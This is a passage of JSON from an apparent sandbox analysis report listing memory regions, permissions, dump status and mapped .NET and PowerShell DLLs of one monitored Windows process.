455737343, "entry_point": 0, "filename": null, "id": "region_1694", "name": "private_0x000000001abd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 448593920, "timestamp": "00:01:09.609", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001695-addr_0x000000001b2a0000-size_0x0000000000101000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_300", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 455737344, "type": "region", "version": 1 }, "end_va": 456790015, "entry_point": 0, "filename": null, "id": "region_1695", "name": "private_0x000000001b2a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 455737344, "timestamp": "00:01:09.609", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001696-addr_0x000000001b490000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_301", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 457768960, "type": "region", "version": 1 }, "end_va": 458293247, "entry_point": 0, "filename": null, "id": "region_1696", "name": "private_0x000000001b490000", "norm_filename": null, "region_type": "private_memory", "start_va": 457768960, "timestamp": "00:01:09.610", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 15581184, "start_va": 8791305158656, "type": "region", "version": 1 }, "end_va": 8791320739839, "entry_point": 8791305158656, 
"filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "id": "region_1697", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791305158656, "timestamp": "00:01:09.610", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001698-addr_0x000007ff00020000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_302", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798185984, "type": "region", "version": 1 }, "end_va": 8791798251519, "entry_point": 0, "filename": null, "id": "region_1698", "name": "private_0x000007ff00020000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798185984, "timestamp": "00:01:09.611", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001699-addr_0x000007ff00030000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_303", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798251520, "type": "region", "version": 1 }, "end_va": 8791798317055, "entry_point": 0, "filename": null, "id": "region_1699", "name": "private_0x000007ff00030000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798251520, "timestamp": "00:01:09.611", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001700-addr_0x000007ff00040000-size_0x00000000000a0000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": 
"proc_dump_304", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 8791798317056, "type": "region", "version": 1 }, "end_va": 8791798972415, "entry_point": 0, "filename": null, "id": "region_1700", "name": "private_0x000007ff00040000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798317056, "timestamp": "00:01:09.612", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001701-addr_0x000007ff000e0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_305", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798972416, "type": "region", "version": 1 }, "end_va": 8791799037951, "entry_point": 0, "filename": null, "id": "region_1701", "name": "private_0x000007ff000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798972416, "timestamp": "00:01:09.612", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001702-addr_0x000007ff000f0000-size_0x0000000000070000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_306", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 8791799037952, "type": "region", "version": 1 }, "end_va": 8791799496703, "entry_point": 0, "filename": null, "id": "region_1702", "name": "private_0x000007ff000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799037952, "timestamp": "00:01:09.612", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001703-addr_0x000007fffffae000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" 
], "ref_process_dump": { "ref_id": "proc_dump_307", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092686336, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_1703", "name": "private_0x000007fffffae000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092686336, "timestamp": "00:01:09.613", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001704-addr_0x000007fffffd3000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_308", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092837888, "type": "region", "version": 1 }, "end_va": 8796092846079, "entry_point": 0, "filename": null, "id": "region_1704", "name": "private_0x000007fffffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092837888, "timestamp": "00:01:09.613", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001718-addr_0x0000000001fc0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_316", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 33292288, "type": "region", "version": 1 }, "end_va": 33357823, "entry_point": 0, "filename": null, "id": "region_1718", "name": "private_0x0000000001fc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33292288, "timestamp": "00:01:11.207", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", 
"writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 458293248, "type": "region", "version": 1 }, "end_va": 461316095, "entry_point": 460975134, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_1719", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 458293248, "timestamp": "00:01:11.207", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 729088, "start_va": 8791263477760, "type": "region", "version": 1 }, "end_va": 8791264206847, "entry_point": 8791263477760, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_1720", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791263477760, "timestamp": "00:01:11.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10629120, "start_va": 8791294476288, "type": "region", "version": 1 }, "end_va": 8791305105407, "entry_point": 8791294476288, "filename": 
"\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll", "id": "region_1721", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791294476288, "timestamp": "00:01:11.208", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001722-addr_0x000007ff00160000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_317", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799496704, "type": "region", "version": 1 }, "end_va": 8791799562239, "entry_point": 0, "filename": null, "id": "region_1722", "name": "private_0x000007ff00160000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799496704, "timestamp": "00:01:11.209", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001723-addr_0x000007fffff00000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_318", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8796091973632, "type": "region", "version": 1 }, "end_va": 8796092039167, "entry_point": 0, "filename": null, "id": "region_1723", "name": "private_0x000007fffff00000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796091973632, "timestamp": "00:01:11.209", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001724-addr_0x000007fffff10000-size_0x0000000000090000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", 
"executable" ], "ref_process_dump": { "ref_id": "proc_dump_319", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 589824, "start_va": 8796092039168, "type": "region", "version": 1 }, "end_va": 8796092628991, "entry_point": 0, "filename": null, "id": "region_1724", "name": "private_0x000007fffff10000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092039168, "timestamp": "00:01:11.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11915264, "start_va": 8791249059840, "type": "region", "version": 1 }, "end_va": 8791260975103, "entry_point": 8791249059840, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll", "id": "region_1726", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791249059840, "timestamp": "00:01:11.741", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 33357824, "type": "region", "version": 1 }, "end_va": 33370111, "entry_point": 33357824, "filename": "\\Windows\\System32\\l_intl.nls", "id": "region_1731", "name": "l_intl.nls", "norm_filename": "c:\\windows\\system32\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 33357824, "timestamp": "00:01:11.884", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 456851456, "type": "region", "version": 1 }, "end_va": 457637887, "entry_point": 456851456, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_1732", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 456851456, "timestamp": "00:01:11.885", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006782060, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_1737", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:01:12.002", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001739-addr_0x0000000001ff0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_322", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 33488896, "type": "region", "version": 1 }, "end_va": 33492991, "entry_point": 0, "filename": null, "id": "region_1739", "name": "private_0x0000000001ff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33488896, "timestamp": "00:01:12.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], 
"ref_process_dump": null, "size": 20480, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 33574911, "entry_point": 33554432, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_1741", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 33554432, "timestamp": "00:01:12.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 42991616, "type": "region", "version": 1 }, "end_va": 43257855, "entry_point": 42991616, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_1742", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 42991616, "timestamp": "00:01:12.296", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001743-addr_0x000007ff00170000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_324", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799562240, "type": "region", "version": 1 }, "end_va": 8791799627775, "entry_point": 0, "filename": null, "id": "region_1743", "name": "private_0x000007ff00170000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799562240, "timestamp": "00:01:12.297", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" 
], "ref_process_dump": null, "size": 32768, "start_va": 42336256, "type": "region", "version": 1 }, "end_va": 42369023, "entry_point": 42348590, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_1758", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 42336256, "timestamp": "00:01:13.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 42401792, "type": "region", "version": 1 }, "end_va": 42405887, "entry_point": 0, "filename": null, "id": "region_1759", "name": "pagefile_0x0000000002870000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 42401792, "timestamp": "00:01:13.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 299008, "start_va": 505610240, "type": "region", "version": 1 }, "end_va": 505909247, "entry_point": 505885368, "filename": "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_1760", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 505610240, "timestamp": "00:01:13.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped 
file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 937984, "start_va": 8791242833920, "type": "region", "version": 1 }, "end_va": 8791243771903, "entry_point": 8791242833920, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll", "id": "region_1761", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791242833920, "timestamp": "00:01:13.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 696320, "start_va": 8791243816960, "type": "region", "version": 1 }, "end_va": 8791244513279, "entry_point": 8791243816960, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll", "id": "region_1762", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791243816960, "timestamp": "00:01:13.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 8791244537856, "type": "region", "version": 1 }, "end_va": 8791244742655, "entry_point": 8791244537856, "filename": 
"\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll", "id": "region_1763", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791244537856, "timestamp": "00:01:13.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 8791244800000, "type": "region", "version": 1 }, "end_va": 8791245230079, "entry_point": 8791244800000, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_1764", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791244800000, "timestamp": "00:01:13.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3334144, "start_va": 8791245258752, "type": "region", "version": 1 }, "end_va": 8791248592895, "entry_point": 8791245258752, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll", "id": "region_1765", "name": "system.core.ni.dll", "norm_filename": 
"c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791245258752, "timestamp": "00:01:13.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 43319296, "type": "region", "version": 1 }, "end_va": 43323391, "entry_point": 0, "filename": null, "id": "region_1798", "name": "pagefile_0x0000000002950000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 43319296, "timestamp": "00:01:16.605", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001799-addr_0x000000001b800000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_331", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 461373440, "type": "region", "version": 1 }, "end_va": 462422015, "entry_point": 0, "filename": null, "id": "region_1799", "name": "private_0x000000001b800000", "norm_filename": null, "region_type": "private_memory", "start_va": 461373440, "timestamp": "00:01:16.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 6884820647936, "type": "region", "version": 1 }, "end_va": 6884820688895, "entry_point": 6884820666128, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll", "id": "region_1800", "name": "culture.dll", "norm_filename": 
"c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 6884820647936, "timestamp": "00:01:16.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 253952, "start_va": 8791238443008, "type": "region", "version": 1 }, "end_va": 8791238696959, "entry_point": 8791238443008, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll", "id": "region_1801", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791238443008, "timestamp": "00:01:16.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1146880, "start_va": 8791239426048, "type": "region", "version": 1 }, "end_va": 8791240572927, "entry_point": 8791239426048, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_1802", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791239426048, "timestamp": "00:01:16.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2187264, "start_va": 8791240605696, "type": "region", "version": 1 }, "end_va": 8791242792959, "entry_point": 8791240605696, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll", "id": "region_1803", "name": "microsoft.powershell.commands.utility.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791240605696, "timestamp": "00:01:16.608", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 344064, "start_va": 43909120, "type": "region", "version": 1 }, "end_va": 44253183, "entry_point": 43909120, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll", "id": "region_1810", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 43909120, "timestamp": "00:01:17.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1658880, "start_va": 8791232741376, "type": "region", "version": 1 }, "end_va": 8791234400255, "entry_point": 8791232741376, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll", "id": 
"region_1811", "name": "system.directoryservices.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791232741376, "timestamp": "00:01:17.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1490944, "start_va": 8791234445312, "type": "region", "version": 1 }, "end_va": 8791235936255, "entry_point": 8791234445312, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll", "id": "region_1812", "name": "system.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791234445312, "timestamp": "00:01:17.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 6967296, "start_va": 8791283400704, "type": "region", "version": 1 }, "end_va": 8791290367999, "entry_point": 8791283400704, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll", "id": "region_1813", "name": "system.xml.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791283400704, "timestamp": "00:01:17.654", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000010-region_00001855-addr_0x000007ff00180000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_333", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799627776, "type": "region", "version": 1 }, "end_va": 8791799693311, "entry_point": 0, "filename": null, "id": "region_1855", "name": "private_0x000007ff00180000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799627776, "timestamp": "00:01:18.764", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001856-addr_0x000007ff00190000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_334", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799693312, "type": "region", "version": 1 }, "end_va": 8791799758847, "entry_point": 0, "filename": null, "id": "region_1856", "name": "private_0x000007ff00190000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799693312, "timestamp": "00:01:18.764", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001857-addr_0x000007ff001a0000-size_0x0000000000010000-perm_.bin", 